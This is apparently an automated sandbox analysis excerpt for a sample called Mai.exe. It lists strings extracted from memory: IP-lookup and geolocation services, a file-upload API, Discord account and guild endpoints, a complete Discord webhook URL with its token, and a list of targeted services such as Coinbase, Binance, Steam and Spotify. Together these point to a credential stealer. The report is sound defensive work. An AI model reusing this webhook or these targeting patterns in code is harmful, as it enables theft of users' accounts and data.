                  Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
                  Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\AppData\Roaming\svchost.exe; File created: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\IE\read_it.txt
                  Source: global traffic; DNS traffic detected: DNS query: rentry.co
                  Source: Mai.exe, 00000004.00000002.2724335316.000001995FB20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.dabeaz.com/ply)
                  Source: Mai.exe, 00000002.00000003.1472086340.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1472720577.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1471062686.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1473163789.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1470937814.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1471598606.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                  Source: Mai.exe, 00000004.00000002.2707419898.000001995DCCB000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2207794122.000001995E5EE000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2276777299.000001995E5EE000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718201292.000001995E611000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2379937424.000001995E60D000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2460640379.000001995DCC3000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2296012741.000001995E5EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
                  Source: Mai.exe, 00000004.00000003.2229475419.000001995E500000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2115362009.000001995E49A000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1552591972.000001995E49A000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2167480812.000001995E4C4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2242126610.000001995E503000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2136590998.000001995E4BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
                  Source: Mai.exe, 00000004.00000003.1540933860.000001995E361000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
                  Source: Mai.exe, 00000004.00000003.1540360354.000001995E36E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
                  Source: Mai.exe, 00000004.00000003.2321410286.000001995F46C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2554277610.000001995F46C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289950600.000001995F46C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2471562987.000001995F46C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2588079315.000001995F484000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
                  Source: Mai.exe, 00000004.00000003.2187500147.000001995F2FB000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2312508752.000001995F339000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2252890863.000001995F2FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
                  Source: Mai.exe, 00000004.00000003.2554277610.000001995F464000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2256955753.000001995F1A9000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2382446743.000001995F1B1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2722046903.000001995F464000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2245681829.000001995F19D000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2471562987.000001995F464000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2321410286.000001995F464000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2085371455.000001995F19D000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289950600.000001995F464000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rfc-editor.org/info/rfc7253
                  Source: Mai.exe, 00000004.00000003.2299331303.000001995F373000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289950600.000001995F3E1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2294320658.000001995F361000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2085371455.000001995F354000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2324667603.000001995F374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tarsnap.com/scrypt/scrypt-slides.pdf
                  Source: Mai.exe, 00000004.00000003.2430683821.000001995F073000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1554271336.000001995F1CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwwsearch.sf.net/):
                  Source: Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://aliexpress.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aliexpress.com)z&
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://amazon.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazon.com)z
                  Source: Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerr
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgr
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://binance.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://binance.com)z
                  Source: Mai.exe, 00000004.00000002.2718989506.000001995E720000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2719111296.000001995E820000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue44497.
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/avatars/
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/avatars/r$
                  Source: Mai.exe, Mai.exe, 00000004.00000002.2727243281.00007FFBA457C000.00000002.00000001.01000000.00000024.sdmpString found in binary or memory: https://cffi.readthedocs.io/en/latest/using.html#callbacks
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://checkip.amazonaws.com
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://checkip.amazonaws.coml
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkip.amazonaws.comz
                  Source: Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://coinbase.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://coinbase.com)z
                  Source: Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crunchyroll.com)
                  Source: Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crunchyroll.com)z
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com)z
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/users/
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v6/guilds/
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v6/guilds/-1.dll
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v6/guilds/r
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v6/users/
                  Source: Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
                  Source: Mai.exe, 00000004.00000002.2719934245.000001995ED50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1258069699774906413/e-hqRvwqHXL2f7YpIVUE6bKm7MAIquuDvncT3SZ5L7vnNYS
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.gg/
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.gg/r
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2719934245.000001995ED50000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.gift/
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v6/users/
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://disney.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://disney.com)z$
                  Source: Mai.exe, 00000004.00000003.1548165458.000001995E077000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2208933769.000001995DF89000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2204751911.000001995DF65000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1541731901.000001995E077000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2227171262.000001995E065000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1545270960.000001995E077000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2225151854.000001995DFFB000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2247616159.000001995E067000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2285064272.000001995E0DB000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2177784313.000001995DF36000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2282469085.000001995E0B4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2223311860.000001995DFF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
                  Source: Mai.exe, 00000004.00000003.2208933769.000001995DF89000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2204751911.000001995DF65000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2252092172.000001995DFFC000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1548165458.000001995DFAD000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1536553084.000001995E01D000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2225151854.000001995DFFB000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2605770097.000001995E02A000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1540473126.000001995E01D000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1545270960.000001995E01D000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2302459753.000001995E01E000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2177784313.000001995DF36000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1541731901.000001995E01D000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2223311860.000001995DFF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/multiprocessing.html
                  Source: Mai.exe, 00000004.00000002.2724125652.000001995F980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/socket.html#socket.socket.connect_ex
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ebay.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ebay.com)z$
                  Source: Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://epicgames.com)
                  Source: Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://expressvpn.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://expressvpn.com)z
                  Source: Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://geolocation-db.com/jsonp/
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://geolocation-db.com/jsonp/%
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://geolocation-db.com/jsonp/z
                  Source: Mai.exe, 00000004.00000002.2719241146.000001995E920000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2719934245.000001995ED50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gist.github.com/lyssdod/f51579ae8d93c8657a5564aefc2ffbca
                  Source: Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com)z
                  Source: Mai.exe, 00000004.00000003.2229794831.000001995F0B3000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2090188958.000001995F08B000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2270682947.000001995F0D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Ousret/charset_normalizer
                  Source: Mai.exe, 00000004.00000003.1552004791.000001995E6B4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1552004791.000001995E665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr#r$Nrjr
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://spotify.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spotify.com)z
                  Source: Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://stake.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stake.com))
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steam.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.com)z
                  Source: Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://telegram.com)
                  Source: Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telegram.com)z
